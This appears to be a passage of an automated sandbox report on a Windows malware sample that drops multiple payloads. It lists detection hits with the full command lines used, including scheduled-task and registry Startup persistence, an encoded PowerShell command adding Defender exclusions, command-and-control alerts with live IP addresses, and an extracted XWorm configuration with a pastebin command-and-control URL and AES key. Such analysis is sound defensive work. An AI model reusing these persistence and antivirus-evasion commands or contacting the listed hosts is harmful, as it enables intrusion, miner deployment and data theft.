                            Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\ProgramData\1be588a5b7, CommandLine: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\ProgramData\1be588a5b7, CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: c:\programdata\1be588a5b7\gdsun.exe, ParentImage: C:\ProgramData\1be588a5b7\gdsun.exe, ParentProcessId: 7328, ParentProcessName: gdsun.exe, ProcessCommandLine: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\ProgramData\1be588a5b7, ProcessId: 7392, ProcessName: reg.exe
                            Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                            Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5176, TargetFilename: C:\ProgramData\1be588a5b7\T.exe
                            Sigma detected: SCR File Write Event
                            Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Desktop\wow.exe, ProcessId: 6092, TargetFilename: C:\Users\user\Downloads\haus\Photo.scr
                            Sigma detected: Suspicious Execution of Powershell with Base64
                            Source: Process startedAuthor: frack113: Data: Command: powershell -EncodedCommand "PAAjAFcANQB1ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAeABHAHMAVwBKAHUATQBXACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAFYAbgBCAHYARwBFADkASgBLACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAOABKADAAIwA+AA==" , CommandLine: powershell -EncodedCommand "PAAjAFcANQB1ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAeABHAHMAVwBKAHUATQBXACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAFYAbgBCAHYARwBFADkASgBLACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAOABKADAAIwA+AA==" , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "cmd.exe" /C powershell -EncodedCommand "PAAjAFcANQB1ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAeABHAHMAVwBKAHUATQBXACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAFYAbgBCAHYARwBFADkASgBLACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAOABKADAAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7860, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -EncodedCommand "PAAjAFcANQB1ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAeABHAHMAVwBKAHUATQBXACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAFYAbgBCAHYARwBFADkASgBLACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAOABKADAAIwA+AA==" , ProcessId: 8028, ProcessName: powershell.exe
                            Sigma detected: Suspicious Schtasks From Env Var Folder
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "vapo" /tr "C:\Users\user\AppData\Roaming\vapo.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "vapo" /tr "C:\Users\user\AppData\Roaming\vapo.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Downloads\haus\vapo.exe" , ParentImage: C:\Users\user\Downloads\haus\vapo.exe, ParentProcessId: 7348, ParentProcessName: vapo.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "vapo" /tr "C:\Users\user\AppData\Roaming\vapo.exe", ProcessId: 7624, ProcessName: schtasks.exe
                            Sigma detected: Suspicious Screensaver Binary File Creation
                            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\wow.exe, ProcessId: 6092, TargetFilename: C:\Users\user\Downloads\haus\Photo.scr
                            Sigma detected: Uncommon Svchost Parent Process
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Downloads\haus\sel1.exe" , ParentImage: C:\Users\user\Downloads\haus\sel1.exe, ParentProcessId: 7188, ParentProcessName: sel1.exe, ProcessCommandLine: svchost.exe, ProcessId: 7240, ProcessName: svchost.exe
                            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\haus\Lovform.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\haus\Lovform.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\wow.exe", ParentImage: C:\Users\user\Desktop\wow.exe, ParentProcessId: 6092, ParentProcessName: wow.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\haus\Lovform.vbs" , ProcessId: 7740, ProcessName: wscript.exe
                            Sigma detected: Non Interactive PowerShell Process Spawned
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -EncodedCommand "PAAjAFcANQB1ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAeABHAHMAVwBKAHUATQBXACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAFYAbgBCAHYARwBFADkASgBLACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAOABKADAAIwA+AA==" , CommandLine: powershell -EncodedCommand "PAAjAFcANQB1ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAeABHAHMAVwBKAHUATQBXACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAFYAbgBCAHYARwBFADkASgBLACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAOABKADAAIwA+AA==" , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "cmd.exe" /C powershell -EncodedCommand "PAAjAFcANQB1ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAeABHAHMAVwBKAHUATQBXACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAFYAbgBCAHYARwBFADkASgBLACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAOABKADAAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7860, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -EncodedCommand "PAAjAFcANQB1ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAeABHAHMAVwBKAHUATQBXACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAFYAbgBCAHYARwBFADkASgBLACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAOABKADAAIwA+AA==" , ProcessId: 8028, ProcessName: powershell.exe
                            Sigma detected: Windows Processes Suspicious Parent Directory
                            Source: Process startedAuthor: vburov: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Downloads\haus\sel1.exe" , ParentImage: C:\Users\user\Downloads\haus\sel1.exe, ParentProcessId: 7188, ParentProcessName: sel1.exe, ProcessCommandLine: svchost.exe, ProcessId: 7240, ProcessName: svchost.exe

                            Persistence and Installation Behavior

                            barindex
                            Sigma detected: Schedule system process
                            Source: Process startedAuthor: Joe Security: Data: Command: "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe", CommandLine: "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Downloads\haus\conhost.exe" , ParentImage: C:\Users\user\Downloads\haus\conhost.exe, ParentProcessId: 7500, ParentProcessName: conhost.exe, ProcessCommandLine: "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe", ProcessId: 988, ProcessName: cmd.exe

                            Suricata Signatures

                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-01-27T08:22:40.405561+010020355951Domain Observed Used for C2 Detected162.244.210.1216606192.168.2.652680TCP
                            2025-01-27T08:22:43.421128+010020355951Domain Observed Used for C2 Detected191.96.207.1181999192.168.2.654086TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-01-27T08:20:18.217713+010020224821A Network Trojan was detected192.168.2.649780121.127.231.16080TCP
                            2025-01-27T08:20:18.223347+010020224821A Network Trojan was detected192.168.2.649796121.127.231.16680TCP
                            2025-01-27T08:20:18.225677+010020224821A Network Trojan was detected192.168.2.649838185.199.108.133443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-01-27T08:20:18.316295+010020219541A Network Trojan was detected185.199.108.133443192.168.2.649838TCP
                            2025-01-27T08:20:18.636636+010020219541A Network Trojan was detected121.127.231.16680192.168.2.649796TCP
                            2025-01-27T08:20:18.654663+010020219541A Network Trojan was detected121.127.231.16080192.168.2.649780TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-01-27T08:22:40.405561+010020356071Domain Observed Used for C2 Detected162.244.210.1216606192.168.2.652680TCP
                            2025-01-27T08:22:43.421128+010020356071Domain Observed Used for C2 Detected191.96.207.1181999192.168.2.654086TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-01-27T08:20:18.345158+010020256441A Network Trojan was detected185.199.110.133443192.168.2.649841TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-01-27T08:20:17.982008+010020185811A Network Trojan was detected192.168.2.6497875.252.155.7280TCP
                            2025-01-27T08:20:18.017381+010020185811A Network Trojan was detected192.168.2.64979445.138.183.22680TCP
                            2025-01-27T08:20:18.234464+010020185811A Network Trojan was detected192.168.2.649836185.199.111.133443TCP
                            2025-01-27T08:20:18.269290+010020185811A Network Trojan was detected192.168.2.64975845.141.26.23480TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-01-27T08:20:18.003202+010020197142Potentially Bad Traffic192.168.2.64978218.230.108.11380TCP
                            2025-01-27T08:20:18.171601+010020197142Potentially Bad Traffic192.168.2.649842185.199.108.133443TCP
                            2025-01-27T08:20:18.234464+010020197142Potentially Bad Traffic192.168.2.649836185.199.111.133443TCP
                            2025-01-27T08:20:18.269290+010020197142Potentially Bad Traffic192.168.2.64975845.141.26.23480TCP
                            2025-01-27T08:20:18.647845+010020197142Potentially Bad Traffic192.168.2.649760179.43.141.89443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-01-27T08:20:18.310801+010020010463Misc activity185.215.113.5180192.168.2.649776TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-01-27T08:22:40.405561+010028424781Malware Command and Control Activity Detected162.244.210.1216606192.168.2.652680TCP
                            2025-01-27T08:22:43.421128+010028424781Malware Command and Control Activity Detected191.96.207.1181999192.168.2.654086TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-01-27T08:22:32.108072+010028032702Potentially Bad Traffic192.168.2.65166445.131.244.47443TCP
                            2025-01-27T08:22:34.526286+010028032702Potentially Bad Traffic192.168.2.65176845.131.244.47443TCP
                            2025-01-27T08:22:37.669776+010028032702Potentially Bad Traffic192.168.2.65190745.131.244.47443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-01-27T08:22:39.621484+010028349371A Network Trojan was detected192.168.2.6517711.1.1.153UDP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-01-27T08:20:18.011706+010028290562Crypto Currency Mining Activity Detected192.168.2.649774159.65.122.1378080TCP
                            2025-01-27T08:20:18.033371+010028290562Crypto Currency Mining Activity Detected192.168.2.649775185.215.113.5180TCP
                            2025-01-27T08:20:27.163860+010028290562Crypto Currency Mining Activity Detected192.168.2.649948185.215.113.5180TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-01-27T08:20:18.441944+010028202081A Network Trojan was detected185.199.110.133443192.168.2.649841TCP
                            2025-01-27T08:20:18.809685+010028202081A Network Trojan was detected140.238.122.17443192.168.2.649825TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-01-27T08:20:18.346083+010028202451A Network Trojan was detected185.199.110.133443192.168.2.649841TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-01-27T08:20:51.463661+010028528701Malware Command and Control Activity Detected18.230.108.1131533192.168.2.650038TCP
                            2025-01-27T08:20:57.678208+010028528701Malware Command and Control Activity Detected45.138.183.2268972192.168.2.650132TCP
                            2025-01-27T08:21:07.754878+010028528701Malware Command and Control Activity Detected45.138.183.2268972192.168.2.650132TCP
                            2025-01-27T08:21:13.602771+010028528701Malware Command and Control Activity Detected45.138.183.2268972192.168.2.650132TCP
                            2025-01-27T08:21:17.818514+010028528701Malware Command and Control Activity Detected45.138.183.2268972192.168.2.650132TCP
                            2025-01-27T08:21:21.460317+010028528701Malware Command and Control Activity Detected18.230.108.1131533192.168.2.650038TCP
                            2025-01-27T08:21:28.368162+010028528701Malware Command and Control Activity Detected45.138.183.2268972192.168.2.650132TCP
                            2025-01-27T08:21:38.504032+010028528701Malware Command and Control Activity Detected45.138.183.2268972192.168.2.650132TCP
                            2025-01-27T08:21:43.586671+010028528701Malware Command and Control Activity Detected45.138.183.2268972192.168.2.650132TCP
                            2025-01-27T08:21:48.996124+010028528701Malware Command and Control Activity Detected45.138.183.2268972192.168.2.650132TCP
                            2025-01-27T08:21:51.466358+010028528701Malware Command and Control Activity Detected18.230.108.1131533192.168.2.650038TCP
                            2025-01-27T08:21:56.941119+010028528701Malware Command and Control Activity Detected45.138.183.2268972192.168.2.650132TCP
                            2025-01-27T08:22:06.988341+010028528701Malware Command and Control Activity Detected45.138.183.2268972192.168.2.650132TCP
                            2025-01-27T08:22:13.594736+010028528701Malware Command and Control Activity Detected45.138.183.2268972192.168.2.650132TCP
                            2025-01-27T08:22:17.294565+010028528701Malware Command and Control Activity Detected45.138.183.2268972192.168.2.650132TCP
                            2025-01-27T08:22:21.459127+010028528701Malware Command and Control Activity Detected18.230.108.1131533192.168.2.650038TCP
                            2025-01-27T08:22:27.555592+010028528701Malware Command and Control Activity Detected45.138.183.2268972192.168.2.650132TCP
                            2025-01-27T08:22:37.597678+010028528701Malware Command and Control Activity Detected45.138.183.2268972192.168.2.650132TCP
                            2025-01-27T08:22:43.593935+010028528701Malware Command and Control Activity Detected45.138.183.2268972192.168.2.650132TCP
                            2025-01-27T08:22:47.639430+010028528701Malware Command and Control Activity Detected45.138.183.2268972192.168.2.650132TCP
                            2025-01-27T08:22:51.461226+010028528701Malware Command and Control Activity Detected18.230.108.1131533192.168.2.650038TCP
                            2025-01-27T08:22:57.703230+010028528701Malware Command and Control Activity Detected45.138.183.2268972192.168.2.650132TCP
                            2025-01-27T08:23:07.735995+010028528701Malware Command and Control Activity Detected45.138.183.2268972192.168.2.650132TCP
                            2025-01-27T08:23:13.597617+010028528701Malware Command and Control Activity Detected45.138.183.2268972192.168.2.650132TCP
                            2025-01-27T08:23:17.963045+010028528701Malware Command and Control Activity Detected45.138.183.2268972192.168.2.650132TCP
                            2025-01-27T08:23:21.460152+010028528701Malware Command and Control Activity Detected18.230.108.1131533192.168.2.650038TCP
                            2025-01-27T08:23:27.962653+010028528701Malware Command and Control Activity Detected45.138.183.2268972192.168.2.650132TCP
                            2025-01-27T08:23:38.007249+010028528701Malware Command and Control Activity Detected45.138.183.2268972192.168.2.650132TCP
                            2025-01-27T08:23:43.596371+010028528701Malware Command and Control Activity Detected45.138.183.2268972192.168.2.650132TCP
                            2025-01-27T08:23:48.903495+010028528701Malware Command and Control Activity Detected45.138.183.2268972192.168.2.650132TCP
                            2025-01-27T08:23:51.459560+010028528701Malware Command and Control Activity Detected18.230.108.1131533192.168.2.650038TCP
                            2025-01-27T08:23:58.981001+010028528701Malware Command and Control Activity Detected45.138.183.2268972192.168.2.650132TCP
                            2025-01-27T08:24:09.018757+010028528701Malware Command and Control Activity Detected45.138.183.2268972192.168.2.650132TCP
                            2025-01-27T08:24:13.622799+010028528701Malware Command and Control Activity Detected45.138.183.2268972192.168.2.650132TCP
                            2025-01-27T08:24:21.457635+010028528701Malware Command and Control Activity Detected18.230.108.1131533192.168.2.650038TCP
                            2025-01-27T08:24:30.323101+010028528701Malware Command and Control Activity Detected45.138.183.2268972192.168.2.650132TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-01-27T08:20:57.746841+010028529231Malware Command and Control Activity Detected192.168.2.65013245.138.183.2268972TCP
                            2025-01-27T08:21:07.831210+010028529231Malware Command and Control Activity Detected192.168.2.65013245.138.183.2268972TCP
                            2025-01-27T08:21:17.879619+010028529231Malware Command and Control Activity Detected192.168.2.65013245.138.183.2268972TCP
                            2025-01-27T08:21:28.522741+010028529231Malware Command and Control Activity Detected192.168.2.65013245.138.183.2268972TCP
                            2025-01-27T08:21:38.518973+010028529231Malware Command and Control Activity Detected192.168.2.65013245.138.183.2268972TCP
                            2025-01-27T08:21:49.065157+010028529231Malware Command and Control Activity Detected192.168.2.65013245.138.183.2268972TCP
                            2025-01-27T08:21:57.108063+010028529231Malware Command and Control Activity Detected192.168.2.65013245.138.183.2268972TCP
                            2025-01-27T08:22:06.998451+010028529231Malware Command and Control Activity Detected192.168.2.65013245.138.183.2268972TCP
                            2025-01-27T08:22:17.528088+010028529231Malware Command and Control Activity Detected192.168.2.65013245.138.183.2268972TCP
                            2025-01-27T08:22:27.593724+010028529231Malware Command and Control Activity Detected192.168.2.65013245.138.183.2268972TCP
                            2025-01-27T08:22:37.602543+010028529231Malware Command and Control Activity Detected192.168.2.65013245.138.183.2268972TCP
                            2025-01-27T08:22:47.651744+010028529231Malware Command and Control Activity Detected192.168.2.65013245.138.183.2268972TCP
                            2025-01-27T08:22:57.847972+010028529231Malware Command and Control Activity Detected192.168.2.65013245.138.183.2268972TCP
                            2025-01-27T08:23:07.742133+010028529231Malware Command and Control Activity Detected192.168.2.65013245.138.183.2268972TCP
                            2025-01-27T08:23:17.966262+010028529231Malware Command and Control Activity Detected192.168.2.65013245.138.183.2268972TCP
                            2025-01-27T08:23:27.966710+010028529231Malware Command and Control Activity Detected192.168.2.65013245.138.183.2268972TCP
                            2025-01-27T08:23:38.010308+010028529231Malware Command and Control Activity Detected192.168.2.65013245.138.183.2268972TCP
                            2025-01-27T08:23:48.910860+010028529231Malware Command and Control Activity Detected192.168.2.65013245.138.183.2268972TCP
                            2025-01-27T08:23:58.995460+010028529231Malware Command and Control Activity Detected192.168.2.65013245.138.183.2268972TCP
                            2025-01-27T08:24:09.023947+010028529231Malware Command and Control Activity Detected192.168.2.65013245.138.183.2268972TCP
                            2025-01-27T08:24:30.332651+010028529231Malware Command and Control Activity Detected192.168.2.65013245.138.183.2268972TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-01-27T08:20:51.463661+010028528741Malware Command and Control Activity Detected18.230.108.1131533192.168.2.650038TCP
                            2025-01-27T08:21:13.602771+010028528741Malware Command and Control Activity Detected45.138.183.2268972192.168.2.650132TCP
                            2025-01-27T08:21:21.460317+010028528741Malware Command and Control Activity Detected18.230.108.1131533192.168.2.650038TCP
                            2025-01-27T08:21:43.586671+010028528741Malware Command and Control Activity Detected45.138.183.2268972192.168.2.650132TCP
                            2025-01-27T08:21:51.466358+010028528741Malware Command and Control Activity Detected18.230.108.1131533192.168.2.650038TCP
                            2025-01-27T08:22:13.594736+010028528741Malware Command and Control Activity Detected45.138.183.2268972192.168.2.650132TCP
                            2025-01-27T08:22:21.459127+010028528741Malware Command and Control Activity Detected18.230.108.1131533192.168.2.650038TCP
                            2025-01-27T08:22:43.593935+010028528741Malware Command and Control Activity Detected45.138.183.2268972192.168.2.650132TCP
                            2025-01-27T08:22:51.461226+010028528741Malware Command and Control Activity Detected18.230.108.1131533192.168.2.650038TCP
                            2025-01-27T08:23:13.597617+010028528741Malware Command and Control Activity Detected45.138.183.2268972192.168.2.650132TCP
                            2025-01-27T08:23:21.460152+010028528741Malware Command and Control Activity Detected18.230.108.1131533192.168.2.650038TCP
                            2025-01-27T08:23:43.596371+010028528741Malware Command and Control Activity Detected45.138.183.2268972192.168.2.650132TCP
                            2025-01-27T08:23:51.459560+010028528741Malware Command and Control Activity Detected18.230.108.1131533192.168.2.650038TCP
                            2025-01-27T08:24:13.622799+010028528741Malware Command and Control Activity Detected45.138.183.2268972192.168.2.650132TCP
                            2025-01-27T08:24:21.457635+010028528741Malware Command and Control Activity Detected18.230.108.1131533192.168.2.650038TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-01-27T08:20:53.658553+010028559241Malware Command and Control Activity Detected192.168.2.65003818.230.108.1131533TCP

                            Joe Sandbox Signatures

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Antivirus detection for dropped file
                            Source: C:\ProgramData\1be588a5b7\gdsun.exeAvira: detection malicious, Label: HEUR/AGEN.1316138
                            Found malware configuration
                            Source: 0000001C.00000002.2576679059.00000000028E4000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["https://pastebin.com/raw/7G6zzQwJ"], "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}
                            Source: wow.exe.6092.9.memstrminMalware Configuration Extractor: Amadey {"C2 url": ["http://www.jrsoftware.org/ishelp/index.php"]}
                            Multi AV Scanner detection for dropped file
                            Source: C:\ProgramData\1be588a5b7\Enalib.exeReversingLabs: Detection: 42%
                            Source: C:\ProgramData\1be588a5b7\T.exeReversingLabs: Detection: 42%
                            Source: C:\ProgramData\1be588a5b7\gdsun.exeReversingLabs: Detection: 73%
                            Source: C:\Users\user\AppData\Roaming\E743A7.exeReversingLabs: Detection: 86%
                            Source: C:\Users\user\AppData\Roaming\vapo.exeReversingLabs: Detection: 76%
                            Source: C:\Users\user\Downloads\haus\ABC.exeReversingLabs: Detection: 44%
                            Source: C:\Users\user\Downloads\haus\Enalib.exeReversingLabs: Detection: 42%
                            Source: C:\Users\user\Downloads\haus\Loader.exeReversingLabs: Detection: 50%
                            Source: C:\Users\user\Downloads\haus\T.exeReversingLabs: Detection: 42%
                            Source: C:\Users\user\Downloads\haus\WatchDog.exeReversingLabs: Detection: 84%
                            Source: C:\Users\user\Downloads\haus\amada2.exeReversingLabs: Detection: 73%
                            Source: C:\Users\user\Downloads\haus\conhost.exeReversingLabs: Detection: 78%
                            Source: C:\Users\user\Downloads\haus\sel1.exeReversingLabs: Detection: 86%
                            Source: C:\Users\user\Downloads\haus\traf.exeReversingLabs: Detection: 76%
                            Source: C:\Users\user\Downloads\haus\vapo.exeReversingLabs: Detection: 76%
                            Multi AV Scanner detection for submitted file
                            Source: wow.exeVirustotal: Detection: 50%Perma Link
                            Source: wow.exeReversingLabs: Detection: 34%
                            Joe Sandbox ML detected suspicious sample
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 93.6% probability
                            Machine Learning detection for dropped file
                            Source: C:\ProgramData\1be588a5b7\T.exeJoe Sandbox ML: detected
                            Source: C:\ProgramData\1be588a5b7\gdsun.exeJoe Sandbox ML: detected
                            Source: C:\ProgramData\1be588a5b7\Enalib.exeJoe Sandbox ML: detected
                            Sample uses string decryption to hide its real strings
                            Source: 0000001C.00000002.2576679059.00000000028E4000.00000004.00000800.00020000.00000000.sdmpString decryptor: https://pastebin.com/raw/7G6zzQwJ
                            Source: 0000001C.00000002.2576679059.00000000028E4000.00000004.00000800.00020000.00000000.sdmpString decryptor: <123456789>
                            Source: 0000001C.00000002.2576679059.00000000028E4000.00000004.00000800.00020000.00000000.sdmpString decryptor: <Xwormmm>
                            Source: 0000001C.00000002.2576679059.00000000028E4000.00000004.00000800.00020000.00000000.sdmpString decryptor: XWorm V5.2
                            Source: 0000001C.00000002.2576679059.00000000028E4000.00000004.00000800.00020000.00000000.sdmpString decryptor: USB.exe
                            Source: C:\Users\user\Downloads\haus\traf.exeCode function: 15_2_001716BF CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,15_2_001716BF
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_03001938 CryptBinaryToStringA,CryptBinaryToStringA,16_2_03001938
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_03001774 lstrlen,MD5Update,MD5Final,16_2_03001774

                            Bitcoin Miner

                            barindex
                            Yara detected Xmrig cryptocurrency miner
                            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                            Source: Yara matchFile source: 26.2.conhost.exe.2cc0dd5.0.unpack, type: UNPACKEDPE
